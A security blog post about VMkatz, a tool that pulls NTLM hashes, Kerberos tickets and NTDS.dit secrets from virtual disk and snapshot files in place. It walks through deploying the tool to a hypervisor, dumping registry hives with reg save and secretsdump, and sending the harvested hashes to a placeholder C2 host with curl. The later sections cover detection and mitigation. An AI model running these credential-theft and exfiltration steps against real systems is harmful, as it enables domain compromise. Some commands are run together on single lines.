Listen to this Post
Introduction:
In modern red team engagements, the battleground has shifted from network perimeters to the hypervisor and storage layers. Traditional exfiltration of entire virtual machine disk images (VMDKs) is often infeasible due to bandwidth constraints, proxy chains, and the high risk of detection from sustained anomalous traffic. VMkatz addresses this operational gap by enabling in-place credential extraction from VM files—allowing operators to read sensitive artifacts like NTLM hashes and Kerberos tickets directly from the source without moving gigabytes of data.
Learning Objectives:
- Understand the concept of in-place forensic extraction versus traditional data exfiltration.
- Learn to use VMkatz to parse NTLM hashes, DPAPI keys, and NTDS.dit from virtual disk snapshots.
- Identify detection strategies for anomalous storage I/O patterns during an incident response.
You Should Know:
1. The Operational Context of In-Place Extraction
The scenario described by Joas A Santos is a classic red team bottleneck: deep inside a network, connected through a cascade of SOCKS proxies, every kilobyte counts. The discovery of a NAS or virtualization host containing domain controller VMDKs represents a high-value target. However, transferring a 100 GB disk over a 200 KB/s link would take approximately six days—an unacceptable risk. VMkatz (developed by @nikaiw) changes this calculus by operating as a static binary (roughly 2.5 MB) that can be deployed directly on the target host. It reads only the necessary sectors of the VMDK, VMSN (snapshot), or SAV (suspended state) files to locate and decrypt credentials.
Step-by-step guide to using VMkatz:
- Step 1: Deploy the VMkatz binary to the target virtualization host (ESXi, Proxmox, or a mounted NAS share). Use `scp` or a C2 agent to transfer the file.
- Step 2: Navigate to the directory containing the VM files. Identify the target files: `.vmdk` (disk), `.vmsn` (memory snapshot), or `.sav` (saved state).
- Step 3: Execute the binary with the target file path: `./vmkatz -f domain_controller.vmdk`
– Step 4: Parse the output. The tool will extract:
– `NTDS.dit` hashes
– `LSASS` memory artifacts
– `SAM` and `SYSTEM` registry hives - DPAPI master keys and Kerberos tickets
For Linux environments accessing VMDKs, ensure the `libguestfs-tools` are installed to mount and read files without conversion:
Mount a VMDK on a Linux analysis box sudo modprobe nbd sudo qemu-nbd -c /dev/nbd0 /path/to/disk.vmdk sudo mount /dev/nbd0p1 /mnt/vm_mount
2. Extracting Credentials from Virtual Artifacts
Understanding what VMkatz targets is crucial for both offense and defense. When a domain controller is virtualized, its credentials reside in the VMDK file (NTDS.dit, registry) and the VMSN snapshot (memory containing LSASS). By parsing these files locally, the tool bypasses the need to invoke Windows APIs or touch the live network.
Command and Control Integration:
To operationalize this, operators often combine VMkatz with a C2 framework. After extraction, the results (hashes, tickets) can be piped to a staging area for offline cracking or pass-the-hash attacks.
Example: Extract and filter for NTLM hashes ./vmkatz -f DC.vmdk | grep -i "NTLM" > creds.txt Exfiltrate only the small hash file curl -X POST https://c2-server/callback --data-binary @creds.txt
3. Advanced Linux Commands for Forensic Parsing
If the target environment is Linux-based (e.g., Proxmox or KVM), operators can utilize standard Linux tools to interact with the virtual disk images before running specialized tools like VMkatz.
List partitions inside a raw/qcow2/vmdk file:
Without mounting, list filesystems virt-filesystems -a disk.vmdk --all --long -h Extract the SYSTEM hive directly guestfish --ro -a disk.vmdk -i download /Windows/System32/config/SYSTEM SYSTEM.hive
4. Windows-Based Analysis and Credential Harvesting
While VMkatz operates on the hypervisor/storage level, traditional Windows commands remain relevant for verifying extracted data or for lateral movement once credentials are obtained.
Extract hashes from a live SYSTEM hive (alternative methodology):
:: On a compromised Windows host, use reg.exe to save hives reg save HKLM\SYSTEM system.hive reg save HKLM\SAM sam.hive :: Use secretsdump.py (Impacket) to parse python3 secretsdump.py -system system.hive -sam sam.hive LOCAL
5. API Security and Hypervisor Vulnerabilities
The ability to read VMDK files often stems from compromised API credentials for the hypervisor. ESXi, for example, exposes the vSphere API. If an operator obtains vCenter credentials, they can mount VMDKs remotely without ever dropping a binary on disk, using PowerCLI.
PowerCLI Command to mount a VMDK:
Connect-VIServer -Server vcenter.domain.com
$vm = Get-VM -Name "DomainController"
$disk = $vm.ExtensionData.Layout.File | Where-Object {$_.Name -like ".vmdk"}
Note: This requires high privileges; direct mounting is possible via API
6. Cloud Hardening Against Virtual Disk Extraction
In cloud environments (AWS, Azure, GCP), the same principles apply but with different storage mechanisms. If an attacker compromises IAM roles or cloud storage access, they can snapshot EBS volumes or Azure Managed Disks and attach them to an attacker-controlled instance to run extraction tools like VMkatz or secretsdump.
Mitigation:
- Enforce Volume Encryption at rest (KMS) to prevent raw disk reads if the attacker lacks decryption keys.
- Implement Storage I/O Monitoring—anomalous read patterns on volume snapshots should trigger alerts.
- Use Azure Disk Encryption or EBS Encryption by default.
7. Detection and Mitigation Strategies for Blue Teams
The core advantage of tools like VMkatz is the “low and slow” approach—avoiding the massive data transfer that triggers network detection. Blue teams must shift focus to the storage layer.
Detection via Windows Event Logs (If LSASS is targeted live):
– Event ID 4656: Handle to LSASS process requested.
– Event ID 4663: Attempt to access a sensitive file (e.g., NTDS.dit) by a process not typically associated with backup operations.
Linux-based detection on the hypervisor:
Monitor for processes reading VMDK/VMSN files in a non-standard way. Use `auditd` to track access:
auditctl -w /vmfs/volumes/ -p r -k vmdisk_read
ELK/Splunk Queries for Anomalous I/O:
Splunk SPL Example
index=os src_ip=hypervisor sourcetype=linux_secure
| search "read" AND "vmdk"
| stats count by process_name, user
| where count < 10 AND process_name NOT IN ("vpxa", "vmkernel")
What Undercode Say:
- Exfiltration is Dead; In-Place Extraction is the New Norm: Tools like VMkatz highlight a paradigm shift where attackers no longer need to move large files. The ability to surgically extract credentials from static files means defenders can no longer rely solely on network egress monitoring.
- Defense Must Extend to the Hypervisor and Storage I/O: Traditional endpoint detection (EDR) is blind to reads occurring on a NAS or virtualization host if the agent isn’t installed there. Blue teams must implement storage-level auditing, looking for processes like
qemu-nbd,guestfish, or custom binaries interacting with virtual disk files.
Key Takeaway 1: Offensive security now focuses on minimizing digital footprints by manipulating artifacts where they reside, using tools that parse structures like VMDKs without full image mounting.
Key Takeaway 2: The most effective mitigation is layered: encrypt virtual disks at rest, strictly limit who can access hypervisor storage paths, and deploy file integrity monitoring (FIM) specifically on .vmdk, .vmsn, and `.vmem` files to detect unauthorized reads.
Prediction:
As virtualization and cloud adoption continue to dominate enterprise infrastructure, the battleground will increasingly be the storage layer. We will see a rise in “storage-only” attacks where initial access is gained via misconfigured S3 buckets or NFS shares, followed by in-place extraction tools that operate entirely outside the guest OS. Defenders will be forced to adopt “honeypot” virtual disks and advanced I/O analytics to detect these surgical strikes before the keys to the kingdom are silently read.
▶️ Related Video (90% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Joas Antonio – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
